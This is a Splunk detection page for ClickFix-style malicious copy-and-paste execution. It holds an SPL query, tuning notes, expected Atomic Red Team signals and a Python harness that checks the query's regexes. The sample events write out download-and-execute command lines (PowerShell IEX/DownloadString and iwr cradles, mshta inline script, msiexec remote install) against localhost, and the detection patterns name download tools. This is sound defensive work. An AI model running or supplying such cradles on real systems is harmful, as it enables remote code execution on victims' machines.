Detect Malicious Copy and Paste in Splunk
Adversaries may rely on a user copying and pasting code to gain execution (ClickFix). Victims are shown fake error messages, CAPTCHA prompts or troubleshooting instructions on malicious websites or in phishing emails that tell them to open a terminal, the Windows Run dialog or a command prompt and paste a pre-supplied command. The pasted command typically contains a download cradle, an encoded payload or an inline script designed to establish a foothold on the victim machine. ClickFix sidesteps email attachment filtering, browser sandboxing and file-execution controls because no file is ever delivered: the user launches the payload from a trusted, interactive process. Threat actors including Contagious Interview (DPRK-linked), Havoc C2 operators and Lumma Stealer distribution campaigns have leveraged this technique heavily against enterprise users.
MITRE ATT&CK
- Tactic: Execution
- Technique: T1204 User Execution
- Sub-technique: T1204.004 Malicious Copy and Paste
- Canonical reference: https://attack.mitre.org/techniques/T1204/004/
SPL Detection Query
index=wineventlog sourcetype="XmlWinEventLog:Microsoft-Windows-Sysmon/Operational" EventCode=1
((ParentImage="*\\explorer.exe" AND (Image="*\\powershell.exe" OR Image="*\\pwsh.exe" OR Image="*\\cmd.exe" OR Image="*\\mshta.exe" OR Image="*\\wscript.exe" OR Image="*\\cscript.exe"))
OR ((ParentImage="*\\chrome.exe" OR ParentImage="*\\firefox.exe" OR ParentImage="*\\msedge.exe" OR ParentImage="*\\iexplore.exe" OR ParentImage="*\\brave.exe") AND (Image="*\\powershell.exe" OR Image="*\\pwsh.exe" OR Image="*\\cmd.exe" OR Image="*\\mshta.exe"))
OR ((Image="*\\mshta.exe" OR Image="*\\wscript.exe") AND (CommandLine="*javascript:*" OR CommandLine="*vbscript:*" OR CommandLine="*http://*" OR CommandLine="*https://*")))
| eval CommandLineLower=lower(CommandLine)
| eval RunDialogExecution=if(like(ParentImage, "%\\explorer.exe"), 1, 0)
| eval BrowserSpawn=if(match(ParentImage, "(chrome|firefox|msedge|iexplore|brave)\.exe$"), 1, 0)
| eval DownloadCradle=if(match(CommandLineLower, "(downloadstring|downloadfile|net\.webclient|invoke-webrequest|iwr\s|curl\s|wget\s|certutil.*urlcache|bitsadmin.*transfer)"), 1, 0)
| eval EncodedPayload=if(match(CommandLineLower, "(-encodedcommand|-enc\s|frombase64string)"), 1, 0)
| eval InlineScript=if(match(CommandLineLower, "(javascript:|vbscript:)"), 1, 0)
| eval InvokeExpression=if(match(CommandLineLower, "(invoke-expression|iex\(|iex\s)"), 1, 0)
| eval RemoteExec=if(match(CommandLineLower, "(msiexec.*(https?://)|regsvr32.*/i:https?://)"), 1, 0)
| eval ClickFixScore=RunDialogExecution + BrowserSpawn + DownloadCradle + EncodedPayload + InlineScript + InvokeExpression + RemoteExec
| where DownloadCradle=1 OR EncodedPayload=1 OR InlineScript=1 OR InvokeExpression=1 OR RemoteExec=1
| table _time, host, User, Image, CommandLine, ParentImage, ParentCommandLine, RunDialogExecution, BrowserSpawn, DownloadCradle, EncodedPayload, InlineScript, InvokeExpression, RemoteExec, ClickFixScore
| sort - ClickFixScore, - _time

The query detects ClickFix-style malicious copy-and-paste execution from Sysmon Event ID 1 (Process Creation). The initial search keeps three parent/child patterns: explorer.exe spawning a script host (the Run dialog path), a browser process spawning an interpreter, and mshta.exe or wscript.exe launched with an inline javascript:/vbscript: URI or a remote URL on the command line. The eval statements then set seven binary indicators (RunDialogExecution, BrowserSpawn, DownloadCradle, EncodedPayload, InlineScript, InvokeExpression, RemoteExec) and sum them into ClickFixScore. The where clause requires at least one payload indicator beyond the parent process alone, which drops ordinary explorer.exe- or browser-launched interpreters from the results, and the final sort surfaces the highest-scoring events first.

Two points to keep in mind when tuning: match() and like() are case-sensitive in SPL, so CommandLine is lowercased before matching while ParentImage is compared as Sysmon records it; and PowerShell accepts shorter unambiguous prefixes of -EncodedCommand (for example -e or -ec) that the EncodedPayload pattern does not cover, so extend that regex if such variants appear in your telemetry.
Data Sources
- Process: Process Creation (Sysmon Event ID 1) with Image, ParentImage, CommandLine and ParentCommandLine populated
Required Sourcetypes
- XmlWinEventLog:Microsoft-Windows-Sysmon/Operational (searched from index=wineventlog in the query above; adjust the index to match your deployment)
False Positives & Tuning
- IT administrators opening PowerShell from Run dialog with download-related parameters for legitimate patch management or configuration scripts
- Software installers launched from Windows Explorer that chain to PowerShell or cmd with download steps during user-initiated setup
- Browser-based terminal emulators or developer tools that spawn cmd.exe/PowerShell as a subprocess for legitimate integrated terminal functionality
- Legitimate enterprise HTA applications using mshta.exe to fetch UI content from internal HTTP servers — tune by excluding known-internal IP ranges from the CommandLine match
Testing Methodology
Validate this detection against the four Atomic Red Team tests for T1204.004 listed below. Each test describes the behaviour to exercise and the telemetry you should expect to see in Splunk.
- Test 1: ClickFix Run Dialog PowerShell Download Cradle Simulation
Expected signal: Sysmon Event ID 1: Image=powershell.exe, CommandLine containing 'Net.WebClient', 'DownloadString', and 'IEX'. If executed via Win+R: ParentImage=explorer.exe, Sysmon Event ID 13 (Registry Value Set) on HKCU\...\Explorer\RunMRU containing the pasted command. Sysmon Event ID 3 (Network Connection) attempt to 127.0.0.1:8080 (connection refused, but event fires). PowerShell ScriptBlock Log Event ID 4104 with script content.
- Test 2: ClickFix mshta Inline JavaScript Execution
Expected signal: Sysmon Event ID 1: Image=mshta.exe, CommandLine containing 'javascript:' and 'ActiveXObject' and 'WScript.Shell'. Sysmon Event ID 1 child: cmd.exe spawned by mshta.exe with CommandLine 'cmd.exe /c echo ClickFix-AtomicTest > ...'. Sysmon Event ID 11 (File Create): %TEMP%\clickfix_test.txt. If via Win+R: Sysmon Event ID 13 (Registry Value Set) on RunMRU key.
- Test 3: ClickFix Base64-Encoded PowerShell via Run Dialog
Expected signal: Sysmon Event ID 1: Image=powershell.exe, CommandLine containing '-EncodedCommand dwBoAG8AYQBtAGkA'. If executed via Win+R: ParentImage=explorer.exe; Sysmon Event ID 13 (Registry Value Set) on HKCU\...\Explorer\RunMRU with the encoded command string. PowerShell ScriptBlock Log Event ID 4104 shows decoded content 'whoami'. The encoded value 'dwBoAG8AYQBtAGkA' decodes from UTF-16LE Base64 to 'whoami'.
- Test 4: ClickFix msiexec Remote Package Execution
Expected signal: Sysmon Event ID 1: cmd.exe with CommandLine containing 'msiexec /i https://'. Sysmon Event ID 1 child: msiexec.exe with CommandLine containing 'https://127.0.0.1:8443/clickfix-payload.msi' and '/qn'. Sysmon Event ID 3: Network connection attempt to 127.0.0.1:8443 (will fail, no listener). If run via Win+R: Sysmon Event ID 13 on RunMRU key.
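Before the rule goes live it is worth checking that the SPL's regexes actually fire on the command lines the four tests are expected to produce. The following Python re-implementation of the initial search, the eval flags, the where clause and the sort is an added example written for this page, not the vendor's or Splunk's own code. Events are represented as dicts shaped like the fields Splunk extracts from Sysmon Event ID 1; the sample records are constructed to mirror the expected signals above plus a browser-spawned cradle, a benign Run-dialog launch and a short-form `powershell -e` variant. The file paths, the 127.0.0.1 URLs and the `decode_encoded_command` helper (which recovers `whoami` from Test 3's encoded string and also accepts the shorter -e/-ec/-en/-enc prefixes PowerShell allows) are the example's own assumptions.

```python
import base64
import re

# Initial-search clauses. Splunk wildcard field searches are case-insensitive,
# so these suffix checks run on lowercased paths.
SCRIPT_HOSTS = ("\\powershell.exe", "\\pwsh.exe", "\\cmd.exe", "\\mshta.exe", "\\wscript.exe", "\\cscript.exe")
BROWSERS = ("\\chrome.exe", "\\firefox.exe", "\\msedge.exe", "\\iexplore.exe", "\\brave.exe")
FROM_BROWSER = ("\\powershell.exe", "\\pwsh.exe", "\\cmd.exe", "\\mshta.exe")
INLINE_OR_REMOTE = ("javascript:", "vbscript:", "http://", "https://")

# One regex per eval in the SPL, applied to the lowercased CommandLine as there.
INDICATORS = {
    "DownloadCradle": re.compile(r"downloadstring|downloadfile|net\.webclient|invoke-webrequest|iwr\s|curl\s|wget\s|certutil.*urlcache|bitsadmin.*transfer"),
    "EncodedPayload": re.compile(r"-encodedcommand|-enc\s|frombase64string"),
    "InlineScript": re.compile(r"javascript:|vbscript:"),
    "InvokeExpression": re.compile(r"invoke-expression|iex\(|iex\s"),
    "RemoteExec": re.compile(r"msiexec.*https?://|regsvr32.*/i:https?://"),
}
# like() and match() are case-sensitive in SPL; the query applies them to the raw ParentImage.
BROWSER_PARENT = re.compile(r"(chrome|firefox|msedge|iexplore|brave)\.exe$")
# PowerShell also accepts shorter prefixes of -EncodedCommand than the SPL pattern covers (assumption of this example).
ENCODED_ARG = re.compile(r"-(?:e|ec|en|enc|encodedcommand)\s+([A-Za-z0-9+/=]+)", re.IGNORECASE)


def passes_initial_filter(image, parent, cmd):
    """Mirror the three parent/child clauses of the SPL's initial search."""
    img, par, lc = image.lower(), parent.lower(), cmd.lower()
    if par.endswith("\\explorer.exe") and img.endswith(SCRIPT_HOSTS):
        return True
    if par.endswith(BROWSERS) and img.endswith(FROM_BROWSER):
        return True
    return img.endswith(("\\mshta.exe", "\\wscript.exe")) and any(t in lc for t in INLINE_OR_REMOTE)


def decode_encoded_command(cmd):
    """Decode a -EncodedCommand argument (UTF-16LE Base64); None if absent or not decodable."""
    m = ENCODED_ARG.search(cmd)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1), validate=True).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None


def score_event(ev):
    """Apply the SPL's filter, eval flags and where clause to one Event ID 1 record.
    Returns the scored row, or None when the event would not reach the table."""
    image, parent, cmd = ev.get("Image", ""), ev.get("ParentImage", ""), ev.get("CommandLine", "")
    if ev.get("EventCode") != 1 or not passes_initial_filter(image, parent, cmd):
        return None
    lc = cmd.lower()
    flags = {"RunDialogExecution": int(parent.endswith("\\explorer.exe")),
             "BrowserSpawn": int(bool(BROWSER_PARENT.search(parent)))}
    flags.update({name: int(bool(rx.search(lc))) for name, rx in INDICATORS.items()})
    if not any(flags[k] for k in INDICATORS):  # where clause: a parent indicator alone is not enough
        return None
    row = {"Image": image, "ParentImage": parent, "CommandLine": cmd, **flags,
           "ClickFixScore": sum(flags.values())}
    decoded = decode_encoded_command(cmd)
    if decoded:
        row["DecodedCommand"] = decoded  # analyst convenience; the SPL itself does not decode
    return row


def sysmon_event(image, parent, cmdline):
    """Shape one record like the fields Splunk extracts from Sysmon Event ID 1 (constructed sample, not telemetry)."""
    return {"EventCode": 1, "Image": image, "ParentImage": parent, "CommandLine": cmdline}


PS = "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe"
EXPLORER = "C:\\Windows\\explorer.exe"
# Constructed events: the four tests' expected command lines, a browser-spawned cradle,
# a benign Run-dialog launch, and a short-prefix -e variant the EncodedPayload regex misses.
SAMPLE_EVENTS = [
    sysmon_event(PS, EXPLORER, "powershell -nop -w hidden -c \"IEX (New-Object Net.WebClient).DownloadString('http://127.0.0.1:8080/clickfix.ps1')\""),
    sysmon_event("C:\\Windows\\System32\\mshta.exe", EXPLORER, 'mshta javascript:new ActiveXObject("WScript.Shell").Run("cmd.exe /c echo ClickFix-AtomicTest > %TEMP%\\clickfix_test.txt");close()'),
    sysmon_event(PS, EXPLORER, "powershell -EncodedCommand dwBoAG8AYQBtAGkA"),
    sysmon_event("C:\\Windows\\System32\\cmd.exe", EXPLORER, "cmd.exe /c msiexec /i https://127.0.0.1:8443/clickfix-payload.msi /qn"),
    sysmon_event("C:\\Program Files\\PowerShell\\7\\pwsh.exe", "C:\\Program Files (x86)\\Microsoft\\Edge\\Application\\msedge.exe", 'pwsh -nop -c "iex (iwr http://127.0.0.1:8080/x.ps1)"'),
    sysmon_event(PS, EXPLORER, "powershell.exe -NoProfile -File C:\\Scripts\\inventory.ps1"),
    sysmon_event(PS, EXPLORER, "powershell -e dwBoAG8AYQBtAGkA"),
]


def run_detection(events=SAMPLE_EVENTS):
    """Score every event and return the surviving rows, highest ClickFixScore first (the SPL's sort)."""
    rows = [r for r in (score_event(e) for e in events) if r]
    return sorted(rows, key=lambda r: -r["ClickFixScore"])


if __name__ == "__main__":
    for r in run_detection():
        print(r["ClickFixScore"], r["Image"].rsplit("\\", 1)[-1], r.get("DecodedCommand", "-"), r["CommandLine"][:70])
```

Run as a script it prints the five ranked rows: the Test 1 cradle and the Edge-spawned pwsh cradle score 3, Tests 2 to 4 score 2, and the Test 3 row carries the decoded `whoami`. The last two sample events return None for different reasons: the benign `-File` launch is removed by the where clause, which is the rule working as intended, while the `powershell -e` variant is missed because the EncodedPayload pattern only knows `-encodedcommand` and `-enc`, a gap worth closing in the SPL regex.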
References
- https://attack.mitre.org/techniques/T1204/004/
- https://www.proofpoint.com/us/blog/threat-insight/security-brief-clickfix-social-engineering-technique-floods-threat-landscape
- https://www.reliaquest.com/blog/using-captcha-for-compromise/
- https://www.cloudsek.com/blog/unmasking-the-danger-lumma-stealer-malware-exploits-fake-captcha-pages
- https://blog.sekoia.io/clickfake-interview-campaign-by-lazarus/
- https://asec.ahnlab.com/en/73952/
- https://asec.ahnlab.com/en/85699/
- https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1204.004/T1204.004.md